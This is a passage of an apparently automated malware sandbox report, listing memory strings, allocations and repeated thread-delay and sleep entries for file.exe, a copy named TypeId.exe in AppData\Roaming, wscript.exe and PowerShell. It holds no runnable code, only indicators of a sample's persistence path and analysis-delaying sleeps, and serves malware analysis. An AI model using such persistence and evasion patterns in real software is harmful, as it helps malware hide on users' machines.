                Source: TypeId.exe, 00000008.00000002.2547706995.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.0000000002778000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXELRCQ
                Source: TypeId.exe, 0000000A.00000002.4552931765.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEWINSTA0\DEFAULT
                Source: TypeId.exe, 0000000A.00000002.4589958690.0000000006CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEZ
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEUTERNAME=user-PCCOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEDRIVERDATA=C:\WINDOWS\SYSTEM32\DRIVERS\DRIVERDATAFPS_BROWSER_APP_PROFILE_STRING=INTERNET EXPLORERFPS_BROWSER_USER_PROFILE_STRING=DEFAULTHOMEDRIVE=C:HOMEPATH=\
                Source: file.exe, 00000003.00000002.2281972613.0000000002931000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWSFIND FILE 'C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE'.
                Source: wscript.exe, 00000007.00000002.2397072368.0000026A20EB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2394187685.0000026A20EB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: USERS\user\APPDATA\ROAMING\TYPEID.EXEAPPS;00
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /C:/USERS/user/APPDATA/ROAMING/TYPEID.EXE
                Source: TypeId.exe, 00000008.00000002.2547706995.0000000002844000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.0000000002627000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.0000000002989000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.000000000253E000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.0000000002778000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $CQ*C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE
                Source: C:\Users\user\AppData\Local\Temp\file.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeMemory allocated: 4930000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeMemory allocated: 22B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeMemory allocated: 2320000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeMemory allocated: A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeMemory allocated: 43D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeMemory allocated: E90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeMemory allocated: 4860000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599557Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599206Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598750Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598199Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597889Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597757Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597645Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597297Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596969Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596422Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 596093Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595983Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595870Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595590Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595464Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595354Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 595053Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594923Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594797Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594687Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594578Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594468Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594359Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594250Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594140Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 594031Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 593921Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598999Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597566Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597451Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597218Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 597093Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596967Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596850Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596734Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596625Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596515Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596406Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596297Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595843Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595734Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595624Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594949Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeThread delayed: delay time: 594499Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5085Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4614Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeWindow / User API: threadDelayed 1733Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeWindow / User API: threadDelayed 5035Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeWindow / User API: threadDelayed 6904Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeWindow / User API: threadDelayed 2915Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeWindow / User API: foregroundWindowGot 1772Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeWindow / User API: threadDelayed 2040Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeWindow / User API: threadDelayed 3517Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeWindow / User API: threadDelayed 2644Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeWindow / User API: threadDelayed 7198Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5800Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 6204Thread sleep count: 1733 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 6204Thread sleep count: 5035 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -99891s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -99781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -99672s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -99561s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -99453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -99344s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -99231s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -99125s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -99016s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -98902s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -98796s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -98687s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -98575s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -98467s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -98359s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -98250s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -98139s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -98031s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -97922s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -97813s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -97688s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -97563s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -97438s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -97328s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -97219s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -97094s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -96984s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -96875s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -96765s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -96656s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 2276Thread sleep time: -96547s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -599890s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5908Thread sleep count: 6904 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5908Thread sleep count: 2915 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -599557s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -599206s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -599078s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -598969s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -598859s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -598750s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -598640s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -598531s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -598422s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -598312s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -598199s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -598078s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -597889s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -597757s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -597645s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -597515s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -597406s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -597297s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -597187s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -597078s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -596969s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -596859s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -596750s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -596640s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -596531s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -596422s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -596312s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -596203s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -596093s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -595983s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -595870s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -595719s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -595590s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -595464s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -595354s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -595234s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -595053s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -594923s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -594797s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -594687s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -594578s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -594468s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -594359s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -594250s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -594140s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -594031s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 5508Thread sleep time: -593921s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 428Thread sleep count: 2040 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -99874s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -99761s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4012Thread sleep count: 3517 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -99545s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -99436s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -99327s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -99218s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -99109s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -99000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -98891s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -98781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -98672s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -98562s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -98453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exe TID: 4160Thread sleep time: -98344s >= -30000sJump to behavior
